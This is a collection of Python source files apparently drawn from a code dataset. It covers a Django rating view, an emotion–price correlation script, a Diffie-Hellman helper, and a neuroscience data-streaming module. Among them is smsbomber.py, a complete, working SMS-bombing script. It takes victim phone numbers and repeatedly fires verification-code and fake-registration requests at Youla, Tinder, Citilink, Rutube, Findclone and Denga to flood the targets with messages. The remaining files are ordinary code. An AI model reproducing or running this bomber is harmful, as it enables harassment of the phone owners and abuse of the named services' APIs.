HttpResponseRedirect('/moviebase/top-movies/')\n\n\ndef make_rating(request, movie_id):\n\n if request.method == 'POST':\n rating_form = RatingForm(data=request.POST)\n\n if rating_form.is_valid():\n movie = Movie.objects.get(pk=movie_id)\n rating = rating_form.save(commit=False)\n rating.rater = request.user.rater\n rating.movie = movie\n rating.save()\n\n messages.add_message(\n request,\n messages.SUCCESS,\n \"You have registered a review of {}\".format(rating.movie)\n )\n return redirect('/moviebase/rater/{}'.format(request.user.rater.id))\n\n else:\n rating_form = RatingForm()\n\n return render(request,\n \"moviebase/rating.html\",\n {'rating_form': rating_form})","sub_path":"movieratings/moviebase/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"344337465","text":"from scipy.stats.stats import pearsonr\nimport csv\nfrom Dictionary_search import Functions\n\n\nclass CorrelationRes:\n def correlation(emo, name):\n\n price = []\n emotion = []\n with open('result\\\\' + name + '\\\\Csv_data\\\\'+name + \".csv\", 'r') as G:\n # header row indexing with DictReader\n my_csv = csv.DictReader(G, delimiter=',')\n for row in my_csv:\n # print(row['price'])\n price.append(float(row['price']))\n # print(row[emo])\n emotion.append(int(row[emo]))\n # print(price)\n # print(emotion)\n\n correlate = pearsonr(price, emotion)\n return correlate[0]\n\n def correlation_csv(name):\n emotion_list = [\"amusement\", \"interest\", \"pride\", \"joy\", \"pleasure\", \"relief\", \"compassion\",\n \"admiration\", \"contentment\", \"love\", \"disappointment\", \"regret\", \"sadness\",\n \"shame\", \"guilt\", \"hate\", \"contempt\", \"disgust\", \"fear\", \"anger\"]\n\n test_file = open('result\\\\' + name + '\\\\Csv_data\\\\'+name + \"_CT.csv\", \"w\", newline='')\n f = csv.writer(test_file)\n\n count = 0\n if count == 0:\n # Headers\n f.writerow(emotion_list)\n count += 1\n\n row=[]\n for i in emotion_list:\n row.append(CorrelationRes.correlation(i,name))\n f.writerow(row)\n print(row)\n\nCorrelationRes.correlation_csv(\"$AAPL\")","sub_path":"Flask-GitHub/WebSc/Archive/Correlation.py","file_name":"Correlation.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"415239269","text":"import requests\r\nimport re\r\nfrom requests import Session\r\nimport time\r\nimport random\r\nimport string\r\nfrom colorama import Fore, Back, Style, init\r\ninit()\r\n\r\nglobal time\r\nprint(Fore.GREEN+'SMS DESTROY PROGRAMM ACTIVATED')\r\ncount_of_phone=int(input(\"Введите кол-во номер телефона для одновременной атаки \"))\r\nallnumbers=[]\r\nfor i in range(1,count_of_phone+1):\r\n\tprint(Fore.WHITE+\"Введите \"+str(i)+\" номер телефона с кодом страны(Например +7)\")\r\n\tphone=input()\r\n\tallnumbers.append(phone)\r\ncount=int(input(\"Введите кол-во атак \"))\r\nt=int(input(\"Введите временной промежуток между атаками в сек. \"))\r\noperation=1\r\nwhile operation==1:\r\n\tfor i in range(1,count+1):\r\n\t\tfor j in allnumbers:\r\n\t\t\trnd=random.randrange(1,5)\r\n\t\t\trnd1=random.randrange(0,2)\r\n\t\t\tif rnd>1:\r\n\t\t\t\trnd=rnd-rnd1\r\n\t\t\telse:\r\n\t\t\t\trnd=rnd+rnd1\r\n\t\t\r\n\t\t\tif rnd==1:\r\n\t\t\t\tphoneatk=requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': j})\r\n\t\t\telif rnd==2:\r\n\t\t\t\tphoneatk=requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru',\r\n\t\t\t\t\t\tdata={'phone_number': j})\r\n\t\t\telif rnd==3:\r\n\t\t\t\tphoneatk=requests.post('https://www.citilink.ru/registration/confirm/phone/+' + j + '/')\r\n\t\t\telif rnd==4:\r\n\t\t\t\tj=j[1:]\r\n\t\t\t\tphoneatk=requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + j})\r\n\t\t\tif j!=4:\r\n\t\t\t\tj=j[1:]\r\n\t\t\tphoneatk=requests.get('https://findclone.ru/register', params={'phone': '+' + j})\r\n\t\t\tname = ''.join(random.choice(string.ascii_letters) for k in range(6))\r\n\t\t\r\n\t\t\tphoneatk=requests.get('https://online.denga.ru/admin/api/json/registration', data={'phone': j, 'email': name + '@gmail.com','password': '12345678', 'passwordConfirmation': '12345678'})\r\n\t\t\tprint(\"[*] Произведена атака\")\r\n\t\ttime.sleep(t)\r\n\toperation=int(input(\"Операция завершена. Хотите повторить эту операцию?\\n1-да\\n0-нет \"))\r\nprint(\"В таком случае программа закрывается\")\r\n\r\n","sub_path":"smsbomber.py","file_name":"smsbomber.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"410104396","text":"import random\nfrom DH.User import User\nfrom DH.MD5 import MD5\nfrom DH.PrimeDetection import PrimeD\n\ndef find_pg():\n # 生成p,使用Miller Rabin算法进行素性检测\n print(\"#########################################################\")\n print(\"Generate a random number and check if it is prime:\")\n p = random.randint(1,999999999)\n primeDetect = PrimeD()\n while(not primeDetect.PrimeDetection(p)):\n p = random.randint(1,999999999)\n print(\"The final chosen prime number is \"+str(p))\n # 根据p计算g,g一般不会很大,选择2或5,失败则返回-1\n print(\"#########################################################\")\n print(\"Determine g from p:\")\n g = primeDetect.primitiveRoots(p)\n print(\"The final chosen g is \"+str(g))\n return p,g\n\ndef DH(p,g)->User: \n\n # 模拟Alice和Bob生成各自的密钥\n print(\"#########################################################\")\n print(\"User generate their own keys:\")\n Alice = User(random.randint(1,999),p,g)\n print(\"User's key is \"+ str(Alice.my_key))\n return Alice\n # 模拟交换密钥的过程\n # print(\"#########################################################\")\n # print(\"Step 4 Simulate the process of Bob and Alice exchanging keys:\")\n # Alice_key = str(Alice.calculateAESKey(Bob.send_to_other_key))\n # Bob_key = str(Bob.calculateAESKey(Alice.send_to_other_key))\n # print(\"Alice gets the key \"+ Alice_key)\n # print(\"Bob gets the key \"+ Bob_key)\n # # 对得到的密钥计算MD5值,得到AES需要的128bit密钥,并输出密钥值\n # print(\"#########################################################\")\n # print(\"Step 5 The final key is obtained by calculating MD5\")\n # Alice_MD5 = MD5(Alice_key,\"Alice_MD5.txt\")\n # BoB_MD5 = MD5(Bob_key,\"BoB_MD5.txt\")\n # Alice_MD5.md5Encode()\n # BoB_MD5.md5Encode()\n # print(\"#########################################################\")\n # print(\"The key exchange is complete. The key is already stored in the local file\")\n","sub_path":"exp1-socket_final/DH/DH.py","file_name":"DH.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"96379520","text":"\"\"\"Core classes and functions used throughout spyke\"\"\"\n\nfrom __future__ import division\nfrom __future__ import with_statement\n\n__authors__ = ['Martin Spacek', 'Reza Lotun']\n\nimport cPickle\nimport hashlib\nimport time\nfrom datetime import timedelta\nimport os\nimport sys\nimport random\nimport string\nfrom copy import copy\nimport datetime\n\nfrom PyQt4 import QtCore, QtGui\nfrom PyQt4.QtCore import Qt\n\nimport numpy as np\nfrom numpy import pi\n\n# set some numpy options - these should hold for all modules in spyke\nnp.set_printoptions(precision=3)\nnp.set_printoptions(threshold=1000)\nnp.set_printoptions(edgeitems=5)\nnp.set_printoptions(linewidth=150)\nnp.set_printoptions(suppress=True)\n# make overflow, underflow, div by zero, and invalid all raise errors\n# this really should be the default in numpy...\nnp.seterr(all='raise')\n\nimport probes\n\nUNIXEPOCH = datetime.datetime(1970, 1, 1, 0, 0, 0) # UNIX epoch: Jan 1, 1970\n\nMU = '\\xb5' # greek mu symbol\nMICRO = 'u'\n\nDEFHIGHPASSSAMPFREQ = 50000 # default (possibly interpolated) high pass sample freq, Hz\nDEFHIGHPASSSHCORRECT = True\n# apparently KERNELSIZE == number of kernel zero crossings, but that seems to depend on\n# the phase of the kernel, some have one less. Anyway, total number of points in the\n# kernel is this plus 1 (for the middle point) - see Blanche2006\nKERNELSIZE = 12\nassert KERNELSIZE % 2 == 0 # I think kernel size needs to be even\nNCHANSPERBOARD = 32 # TODO: stop hard coding this\n\nMAXLONGLONG = 2**63-1\nMAXNBYTESTOFILE = 2**31 # max array size safe to call .tofile() on in Numpy 1.5.0 on Windows\n\nMAXNSPIKEPLOTS = 200\n\nCHANFIELDLEN = 256 # channel string field length at start of .resample file\n\nINVPI = 1 / pi\n\n\nclass EmptyClass(object):\n pass\n\n\nclass Converter(object):\n \"\"\"Simple object to store intgain and extgain values and provide methods to\n convert between AD and uV values, even when a Stream (where intgain and extgain\n are stored) isn't available\"\"\"\n def __init__(self, intgain, extgain):\n self.intgain = intgain\n self.extgain = extgain\n\n def AD2uV(self, AD):\n \"\"\"Convert rescaled AD values to float32 uV\n Biggest +ve voltage is 10 million uV, biggest +ve rescaled signed int16 AD val\n is half of 16 bits, then divide by internal and external gains\n\n TODO: unsure: does the DT3010 acquire from -10 to 10 V at intgain == 1 and encode\n that from 0 to 4095?\n \"\"\"\n return np.float32(AD) * 10000000 / (2**15 * self.intgain * self.extgain)\n\n def uV2AD(self, uV, inttype=np.int16):\n \"\"\"Convert uV to signed rescaled AD values of type inttype\"\"\"\n return inttype(np.round(uV * (2**15 * self.intgain * self.extgain) / 10000000))\n\n\nclass WaveForm(object):\n \"\"\"Just a container for data, std of data, timestamps, and channels.\n Sliceable in time, and indexable in channel space. Only really used for\n convenient plotting. Everything else uses the sort.wavedata array, and\n related sort.spikes fields\"\"\"\n def __init__(self, data=None, std=None, ts=None, chans=None):\n self.data = data # in AD, potentially multichannel, depending on shape\n self.std = std # std of data\n self.ts = ts # timestamps array in us, one for each sample (column) in data\n self.chans = chans # channel ids corresponding to rows in .data\n\n def __getitem__(self, key):\n \"\"\"Make waveform data sliceable in time, and directly indexable by channel id(s).\n Return a new WaveForm\"\"\"\n \n # check for std field, won't exist for old saved Waveforms in .sort files:\n try: self.std\n except AttributeError: self.std = None\n \n if type(key) == slice: # slice self in time\n if self.ts == None:\n return WaveForm() # empty WaveForm\n else:\n lo, hi = self.ts.searchsorted([key.start, key.stop])\n data = self.data[:, lo:hi]\n if self.std == None:\n std = None\n else:\n std = self.std[:, lo:hi]\n ts = self.ts[lo:hi]\n '''\n if np.asarray(data == self.data).all() and np.asarray(ts == self.ts).all():\n # no need for a new WaveForm, though new WaveForms aren't expensive,\n # only new data are\n return self\n '''\n # return a new WaveForm:\n return WaveForm(data=data, std=std, ts=ts, chans=self.chans)\n else: # index into self by channel id(s)\n keys = toiter(key)\n #try: assert (self.chans == np.sort(self.chans)).all() # testing code\n #except AssertionError: import pdb; pdb.set_trace() # testing code\n try:\n assert set(keys).issubset(self.chans), (\"requested channels outside of \"\n \"channels in waveform\")\n # this is fine:\n #assert len(set(keys)) == len(keys), \"same channel specified more than once\"\n except AssertionError:\n raise IndexError('invalid index %r' % key)\n #i = self.chans.searchsorted(keys) # indices into rows of data\n # best not to assume that chans are sorted, often the case in LFP data;\n # i are indices into rows of data:\n i = [ int(np.where(chan == self.chans)[0]) for chan in keys ]\n data = self.data[i] # grab the appropriate rows of data\n if self.std == None:\n std = None\n else:\n std = self.std[i]\n return WaveForm(data=data, std=std, ts=self.ts, chans=keys) # return a new WaveForm\n\n def __len__(self):\n \"\"\"Number of data points in time\"\"\"\n nt = len(self.ts)\n assert nt == self.data.shape[1] # obsessive\n return nt\n\n def _check_add_sub(self, other):\n \"\"\"Check a few things before adding or subtracting waveforms\"\"\"\n if self.data.shape != other.data.shape:\n raise ValueError(\"Waveform shapes %r and %r don't match\" %\n (self.data.shape, other.data.shape))\n if self.chans != other.chans:\n raise ValueError(\"Waveform channel ids %r and %r don't match\" %\n (self.chans, other.chans))\n\n def __add__(self, other):\n \"\"\"Return new waveform which is self+other. Keep self's timestamps\"\"\"\n self._check_add_sub(other)\n return WaveForm(data=self.data+other.data,\n ts=self.ts, chans=self.chans)\n\n def __sub__(self, other):\n \"\"\"Return new waveform which is self-other. Keep self's timestamps\"\"\"\n self._check_add_sub(other)\n return WaveForm(data=self.data-other.data,\n ts=self.ts, chans=self.chans)\n '''\n def get_padded_data(self, chans):\n \"\"\"Return self.data corresponding to self.chans,\n padded with zeros for chans that don't exist in self\"\"\"\n common = set(self.chans).intersection(chans) # overlapping chans\n dtype = self.data.dtype # self.data corresponds to self.chans\n # padded_data corresponds to chans:\n padded_data = np.zeros((len(chans), len(self.ts)), dtype=dtype)\n chanis = [] # indices into self.chans corresponding to overlapping chans\n commonis = [] # indices into chans corresponding to overlapping chans\n for chan in common:\n chani, = np.where(chan == np.asarray(self.chans))\n commoni, = np.where(chan == np.asarray(chans))\n chanis.append(chani)\n commonis.append(commoni)\n chanis = np.concatenate(chanis)\n commonis = np.concatenate(commonis)\n # for overlapping chans, overwrite the zeros with data:\n padded_data[commonis] = self.data[chanis]\n return padded_data\n '''\n\nclass TrackStream(object):\n \"\"\"A collection of streams, all from the same track. This is used to simultaneously\n cluster all spikes from many (or all) recordings from the same track. Designed to have\n as similar an interface as possible to a normal Stream. srffs needs to be a list of\n open and parsed surf.File objects, in temporal order\"\"\"\n def __init__(self, srffs, trackfname, kind='highpass', sampfreq=None, shcorrect=None):\n # to prevent pickling problems, don't bind srffs\n self.fname = trackfname\n self.kind = kind\n streams = []\n self.streams = streams # bind right away so setting sampfreq and shcorrect will work\n # collect appropriate streams from srffs\n if kind == 'highpass':\n for srff in srffs:\n streams.append(srff.hpstream)\n elif kind == 'lowpass':\n for srff in srffs:\n streams.append(srff.lpstream)\n else: raise ValueError('Unknown stream kind %r' % kind)\n\n datetimes = [stream.datetime for stream in streams]\n if not (np.diff(datetimes) >= timedelta(0)).all():\n raise RuntimeError(\".srf files aren't in temporal order\")\n\n \"\"\"Generate tranges, an array of all the contiguous data ranges in all the\n streams in self. These are relative to the start of acquisition (t=0) in the first\n stream. Also generate streamtranges, an array of each stream's t0 and t1\"\"\"\n tranges = []\n streamtranges = []\n for stream in streams:\n td = stream.datetime - datetimes[0] # time delta between stream i and stream 0\n for trange in stream.tranges:\n t0 = td2usec(td + timedelta(microseconds=int(trange[0])))\n t1 = td2usec(td + timedelta(microseconds=int(trange[1])))\n tranges.append([t0, t1])\n streamt0 = td2usec(td + timedelta(microseconds=int(stream.t0)))\n streamt1 = td2usec(td + timedelta(microseconds=int(stream.t1)))\n streamtranges.append([streamt0, streamt1])\n self.tranges = np.int64(tranges)\n self.streamtranges = np.int64(streamtranges)\n self.t0 = self.streamtranges[0, 0]\n self.t1 = self.streamtranges[-1, 1]\n\n self.layout = streams[0].layout # assume they're identical\n intgains = np.asarray([ stream.converter.intgain for stream in streams ])\n if max(intgains) != min(intgains):\n import pdb; pdb.set_trace() # investigate which are the deviant .srf files\n raise NotImplementedError(\"not all .srf files have the same intgain\")\n # TODO: find recording with biggest intgain, call that value maxintgain. For each\n # recording, scale its AD values by its intgain/maxintgain when returning a slice\n # from its stream. Note that this ratio should always be a factor of 2, so all you\n # have to do is bitshift, I think. Then, have a single converter for the\n # trackstream whose intgain value is set to maxintgain\n self.converter = streams[0].converter # they're identical\n self.srffnames = [srff.fname for srff in srffs]\n self.rawsampfreq = streams[0].rawsampfreq # assume they're identical\n self.rawtres = streams[0].rawtres # assume they're identical\n contiguous = np.asarray([stream.contiguous for stream in streams])\n if not contiguous.all() and kind == 'highpass':\n # don't bother reporting again for lowpass\n fnames = [ s.fname for s, c in zip(streams, contiguous) if not c ]\n print(\"some .srf files are non contiguous:\")\n for fname in fnames:\n print(fname)\n probe = streams[0].probe\n if not np.all([type(probe) == type(stream.probe) for stream in streams]):\n raise RuntimeError(\"some .srf files have different probe types\")\n self.probe = probe # they're identical\n\n # set sampfreq and shcorrect for all streams\n if kind == 'highpass':\n self.sampfreq = sampfreq or DEFHIGHPASSSAMPFREQ # desired sampling frequency\n self.shcorrect = shcorrect or DEFHIGHPASSSHCORRECT\n else: # kind == 'lowpass'\n self.sampfreq = sampfreq or self.rawsampfreq # don't resample by default\n self.shcorrect = shcorrect or False # don't s+h correct by default\n\n def is_open(self):\n return np.all([stream.is_open() for stream in self.streams])\n\n def open(self):\n for stream in self.streams:\n stream.open()\n\n def close(self):\n for stream in self.streams:\n stream.close()\n\n def get_dt(self):\n \"\"\"Get self's duration\"\"\"\n return self.t1 - self.t0\n\n dt = property(get_dt)\n\n def get_chans(self):\n return self.streams[0].chans # assume they're identical\n\n def set_chans(self, chans):\n for stream in self.streams:\n stream.chans = chans\n\n chans = property(get_chans, set_chans)\n\n def get_nchans(self):\n return len(self.chans)\n\n nchans = property(get_nchans)\n\n def get_sampfreq(self):\n return self.streams[0].sampfreq # they're identical\n\n def set_sampfreq(self, sampfreq):\n for stream in self.streams:\n stream.sampfreq = sampfreq\n\n sampfreq = property(get_sampfreq, set_sampfreq)\n\n def get_tres(self):\n return self.streams[0].tres # they're identical\n\n tres = property(get_tres)\n\n def get_shcorrect(self):\n return self.streams[0].shcorrect # they're identical\n\n def set_shcorrect(self, shcorrect):\n for stream in self.streams:\n stream.shcorrect = shcorrect\n\n shcorrect = property(get_shcorrect, set_shcorrect)\n '''\n # having this would make sense, but it isn't currently needed:\n def get_datetime(self):\n return self.streams[0].datetime # datetime of first stream\n\n datetime = property(get_datetime)\n '''\n def pickle(self):\n \"\"\"Just a way to pickle all the .srf files associated with self\"\"\"\n for stream in self.streams:\n stream.pickle()\n\n def __getitem__(self, key):\n \"\"\"Called when Stream object is indexed into using [] or with a slice object,\n indicating start and end timepoints in us. Returns the corresponding WaveForm\n object with the full set of chans\"\"\"\n if key.step not in [None, 1]:\n raise ValueError('unsupported slice step size: %s' % key.step)\n return self(key.start, key.stop, self.chans)\n\n def __call__(self, start, stop, chans=None):\n \"\"\"Figure out which stream(s) the slice spans (usually just one, sometimes 0 or\n 2), send the request to the stream(s), generate the appropriate timestamps, and\n return the waveform\"\"\"\n if chans == None:\n chans = self.chans\n if not set(chans).issubset(self.chans):\n raise ValueError(\"requested chans %r are not a subset of available enabled \"\n \"chans %r in %s stream\" % (chans, self.chans, self.kind))\n nchans = len(chans)\n start, stop = max(start, self.t0), min(stop, self.t1) # stay in bounds\n streamis = []\n ## TODO: this could probably be more efficient by not iterating over all streams:\n for streami, trange in enumerate(self.streamtranges):\n if (trange[0] <= start < trange[1]) or (trange[0] <= stop < trange[1]):\n streamis.append(streami)\n tres = self.tres\n ts = np.arange(start, stop, tres)\n data = np.zeros((nchans, len(ts)), dtype=np.int16) # any gaps will have zeros\n for streami in streamis:\n stream = self.streams[streami]\n abst0 = self.streamtranges[streami, 0] # absolute start time of stream\n # find start and end offsets relative to abst0\n relt0 = max(start - abst0, 0) # stay within stream's lower limit\n relt1 = min(stop - abst0, stream.t1 - stream.t0) # stay within stream's upper limit\n # source slice times:\n st0 = relt0 + stream.t0\n st1 = relt1 + stream.t0\n sdata = stream(st0, st1, chans).data # source data\n # destination time indices:\n dt0i = (abst0 + relt0 - start) // tres # absolute index\n dt1i = dt0i + sdata.shape[1]\n data[:, dt0i:dt1i] = sdata\n return WaveForm(data=data, ts=ts, chans=chans)\n\n\nclass Stream(object):\n \"\"\"Data stream object - provides convenient stream interface to .srf files.\n Maps from timestamps to record index of stream data to retrieve the\n approriate range of waveform data from disk\"\"\"\n def __init__(self, srff, kind='highpass', sampfreq=None, shcorrect=None):\n \"\"\"Takes a sorted temporal (not necessarily evenly-spaced, due to pauses in recording)\n sequence of ContinuousRecords: either HighPassRecords or LowPassMultiChanRecords.\n sampfreq arg is useful for interpolation. Assumes that all HighPassRecords belong\n to the same probe. srff must be open and parsed\"\"\"\n self.srff = srff\n self.kind = kind\n if kind == 'highpass':\n self.records = srff.highpassrecords\n elif kind == 'lowpass':\n self.records = srff.lowpassmultichanrecords\n else: raise ValueError('Unknown stream kind %r' % kind)\n\n # assume same layout for all records of type \"kind\"\n self.layout = self.srff.layoutrecords[self.records['Probe'][0]]\n intgain = self.layout.intgain\n extgain = int(self.layout.extgain[0]) # assume same extgain for all chans in layout\n self.converter = Converter(intgain, extgain)\n self.nADchans = self.layout.nchans # always constant\n self.rawsampfreq = self.layout.sampfreqperchan\n self.rawtres = intround(1 / self.rawsampfreq * 1e6) # us\n if kind == 'highpass':\n ADchans = self.layout.ADchanlist\n if list(self.layout.ADchanlist) != range(self.nADchans):\n print(\"WARNING: ADchans aren't contiguous from 0, highpass recordings are \"\n \"nonstandard. Sample and hold delay correction in self.resample() \"\n \"may not be exactly correct\")\n # probe chans, as opposed to AD chans. Most probe types are contiguous from 0,\n # but there are some exceptions (like pt16a_HS27 and pt16b_HS27):\n self.chans = np.arange(self.nADchans)\n self.sampfreq = sampfreq or DEFHIGHPASSSAMPFREQ # desired sampling frequency\n self.shcorrect = shcorrect or DEFHIGHPASSSHCORRECT\n else: # kind == 'lowpass'\n # probe chan values are already parsed from LFP probe description\n self.chans = self.layout.chans\n self.sampfreq = sampfreq or self.rawsampfreq # don't resample by default\n self.shcorrect = shcorrect or False # don't s+h correct by default\n probename = self.layout.electrode_name\n probename = probename.replace(MU, 'u') # replace any 'micro' symbols with 'u'\n probetype = eval('probes.' + probename) # yucky. TODO: switch to a dict with keywords?\n self.probe = probetype() # instantiate it\n\n rts = self.records['TimeStamp'] # array of record timestamps\n NumSamples = np.unique(self.records['NumSamples'])\n if len(NumSamples) > 1:\n raise RuntimeError(\"Not all continuous records are of the same length. \"\n \"NumSamples = %r\" % NumSamples)\n rtlen = NumSamples / self.nADchans * self.rawtres\n # Check whether rts values are all equally spaced, indicating there were no\n # pauses in recording\n diffrts = np.diff(rts)\n self.contiguous = (np.diff(diffrts) == 0).all() # could also call diff(rts, n=2)\n if self.contiguous:\n try: assert np.unique(diffrts) == rtlen\n except AssertionError: import pdb; pdb.set_trace()\n self.tranges = np.int64([[rts[0], rts[-1]+rtlen]]) # keep it 2D\n else:\n if kind == 'highpass': # don't bother reporting again for lowpass\n print('NOTE: time gaps exist in %s, possibly due to pauses' % self.fname)\n # build up self.tranges\n splitis = np.where(diffrts != rtlen)[0] + 1\n splits = np.split(rts, splitis) # list of arrays of contiguous rts\n tranges = []\n for split in splits: # for each array of contiguous rts\n tranges.append([split[0], split[-1]+rtlen])\n self.tranges = np.int64(tranges)\n self.t0 = self.tranges[0, 0]\n self.t1 = self.tranges[-1, 1]\n\n def is_open(self):\n return self.srff.is_open()\n\n def open(self):\n self.srff.open()\n\n def close(self):\n self.srff.close()\n\n def get_dt(self):\n \"\"\"Get self's duration\"\"\"\n return self.t1 - self.t0\n\n dt = property(get_dt)\n\n def get_fname(self):\n return self.srff.fname\n\n fname = property(get_fname)\n\n def get_srffnames(self):\n return [self.srff.fname]\n\n srffnames = property(get_srffnames)\n\n def get_srcfnameroot(self):\n \"\"\"Get root of filename of source data. Also filter it to make recording\n names from older .srf files more succint\"\"\"\n srcfnameroot = lrstrip(self.fname, '../', '.srf')\n srcfnameroot = srcfnameroot.replace(' - track 5 ', '-tr5-')\n srcfnameroot = srcfnameroot.replace(' - track 6 ', '-tr6-')\n srcfnameroot = srcfnameroot.replace(' - track 7c ', '-tr7c-')\n # replace any remaining spaces with underscores\n srcfnameroot = srcfnameroot.replace(' ', '_')\n return srcfnameroot\n\n srcfnameroot = property(get_srcfnameroot)\n\n def get_nchans(self):\n return len(self.chans)\n\n nchans = property(get_nchans)\n\n def get_sampfreq(self):\n return self._sampfreq\n\n def set_sampfreq(self, sampfreq):\n \"\"\"On .sampfreq change, delete .kernels (if set), and update .tres\"\"\"\n self._sampfreq = sampfreq\n try:\n del self.kernels\n except AttributeError:\n pass\n self.tres = intround(1 / self.sampfreq * 1e6) # us, for convenience\n\n sampfreq = property(get_sampfreq, set_sampfreq)\n\n def get_shcorrect(self):\n return self._shcorrect\n\n def set_shcorrect(self, shcorrect):\n \"\"\"On .shcorrect change, deletes .kernels (if set)\"\"\"\n self._shcorrect = shcorrect\n try:\n del self.kernels\n except AttributeError:\n pass\n\n shcorrect = property(get_shcorrect, set_shcorrect)\n\n def get_datetime(self):\n return self.srff.datetime\n\n datetime = property(get_datetime)\n\n def pickle(self):\n self.srff.pickle()\n\n def __getitem__(self, key):\n \"\"\"Called when Stream object is indexed into using [] or with a slice object,\n indicating start and end timepoints in us. Returns the corresponding WaveForm\n object with the full set of chans\"\"\"\n if key.step not in [None, 1]:\n raise ValueError('unsupported slice step size: %s' % key.step)\n return self(key.start, key.stop, self.chans)\n\n def __call__(self, start, stop, chans=None):\n \"\"\"Called when Stream object is called using (). start and stop indicate start\n and end timepoints in us. Returns the corresponding WaveForm object with just the\n specificed chans\"\"\"\n if chans == None:\n chans = self.chans\n if not set(chans).issubset(self.chans):\n raise ValueError(\"requested chans %r are not a subset of available enabled \"\n \"chans %r in %s stream\" % (chans, self.chans, self.kind))\n nchans = len(chans)\n rawtres = self.rawtres\n resample = self.sampfreq != self.rawsampfreq or self.shcorrect == True\n if resample:\n # excess data in us at either end, to eliminate interpolation distortion at\n # key.start and key.stop\n xs = KERNELSIZE * rawtres\n else:\n xs = 0\n # get a slightly greater range of raw data (with xs) than might be needed:\n t0xsi = (start - xs) // rawtres # round down to nearest mult of rawtres\n t1xsi = ((stop + xs) // rawtres) + 1 # round up to nearest mult of rawtres\n # stay within stream limits, thereby avoiding interpolation edge effects:\n t0xsi = max(t0xsi, self.t0 // rawtres)\n t1xsi = min(t1xsi, self.t1 // rawtres)\n # convert back to us:\n t0xs = t0xsi * rawtres\n t1xs = t1xsi * rawtres\n tsxs = np.arange(t0xs, t1xs, rawtres)\n ntxs = len(tsxs)\n # init data as int32 so we have bitwidth to rescale and zero, then convert to int16\n dataxs = np.zeros((nchans, ntxs), dtype=np.int32) # any gaps will have zeros\n\n # Find all contiguous tranges that t0xs and t1xs span, if any. Note that this\n # can now deal with case where len(trangeis) > 1. Test by asking for a slice\n # longer than any one trange or gap between tranges, like by calling:\n # >>> self.hpstream(201900000, 336700000)\n # on file ptc15.74.\n trangeis, = np.where((self.tranges[:, 0] <= t1xs) & (t0xs < self.tranges[:, 1]))\n tranges = []\n if len(trangeis) > 0:\n tranges = self.tranges[trangeis]\n #print('tranges:'); print(tranges)\n # collect relevant records from spanned tranges, if any:\n records = []\n for trange in tranges:\n trrec0i, trrec1i = self.records['TimeStamp'].searchsorted(trange)\n trrecis = np.arange(trrec0i, trrec1i)\n trrts = self.records['TimeStamp'][trrecis]\n trrecs = self.records[trrecis]\n rec0i, rec1i = trrts.searchsorted([t0xs, t1xs])\n rec0i = max(rec0i-1, 0)\n recis = np.arange(rec0i, rec1i)\n records.append(trrecs[recis])\n if len(records) > 0:\n records = np.concatenate(records)\n\n # load up data+excess, from all relevant records\n # TODO: fix code duplication\n #tload = time.time()\n if self.kind == 'highpass': # straightforward\n chanis = self.layout.ADchanlist.searchsorted(chans)\n for record in records: # iterating over highpass records\n d = self.srff.loadContinuousRecord(record)[chanis] # record's data on chans\n nt = d.shape[1]\n t0i = record['TimeStamp'] // rawtres\n t1i = t0i + nt\n # source indices\n st0i = max(t0xsi - t0i, 0)\n st1i = min(t1xsi - t0i, nt)\n # destination indices\n dt0i = max(t0i - t0xsi, 0)\n dt1i = min(t1i - t0xsi, ntxs)\n dataxs[:, dt0i:dt1i] = d[:, st0i:st1i]\n else: # kind == 'lowpass', need to load chans from subsequent records\n chanis = [ int(np.where(chan == self.layout.chans)[0]) for chan in chans ]\n \"\"\"NOTE: if the above raises an error it may be because this particular\n combination of LFP chans was incorrectly parsed due to a bug in the .srf file,\n and a manual remapping needs to be added to Surf.File.fixLFPlabels()\"\"\"\n # assume all lpmc records are same length:\n nt = records[0]['NumSamples'] / self.nADchans\n d = np.zeros((nchans, nt), dtype=np.int32)\n for record in records: # iterating over lowpassmultichan records\n for i, chani in enumerate(chanis):\n lprec = self.srff.lowpassrecords[record['lpreci']+chani]\n d[i] = self.srff.loadContinuousRecord(lprec)\n t0i = record['TimeStamp'] // rawtres\n t1i = t0i + nt\n # source indices\n st0i = max(t0xsi - t0i, 0)\n st1i = min(t1xsi - t0i, nt)\n # destination indices\n dt0i = max(t0i - t0xsi, 0)\n dt1i = min(t1i - t0xsi, ntxs)\n dataxs[:, dt0i:dt1i] = d[:, st0i:st1i]\n #print('record.load() took %.3f sec' % (time.time()-tload))\n\n # bitshift left to scale 12 bit values to use full 16 bit dynamic range, same as\n # * 2**(16-12) == 16. This provides more fidelity for interpolation, reduces uV per\n # AD to about 0.02\n dataxs <<= 4 # data is still int32 at this point\n\n # do any resampling if necessary:\n if resample:\n #tresample = time.time()\n dataxs, tsxs = self.resample(dataxs, tsxs, chans)\n #print('resample took %.3f sec' % (time.time()-tresample))\n\n # now trim down to just the requested time range:\n lo, hi = tsxs.searchsorted([start, stop])\n data = dataxs[:, lo:hi]\n ts = tsxs[lo:hi]\n\n # should be safe to convert back down to int16 now:\n data = np.int16(data)\n return WaveForm(data=data, ts=ts, chans=chans)\n\n def resample(self, rawdata, rawts, chans):\n \"\"\"Return potentially sample-and-hold corrected and Nyquist interpolated\n data and timepoints. See Blanche & Swindale, 2006\"\"\"\n #print('sampfreq, rawsampfreq, shcorrect = (%r, %r, %r)' %\n # (self.sampfreq, self.rawsampfreq, self.shcorrect))\n rawtres = self.rawtres # us\n tres = self.tres # us\n # resample factor: n output resampled points per input raw point:\n resamplex = intround(self.sampfreq / self.rawsampfreq)\n assert resamplex >= 1, 'no decimation allowed'\n N = KERNELSIZE\n\n # check if kernels have been generated already\n try:\n self.kernels\n except AttributeError:\n self.kernels = self.get_kernels(self.layout.ADchanlist, resamplex, N)\n\n # convolve the data with each kernel\n nrawts = len(rawts)\n nchans = len(chans)\n # all the interpolated points have to fit in between the existing raw\n # points, so there's nrawts 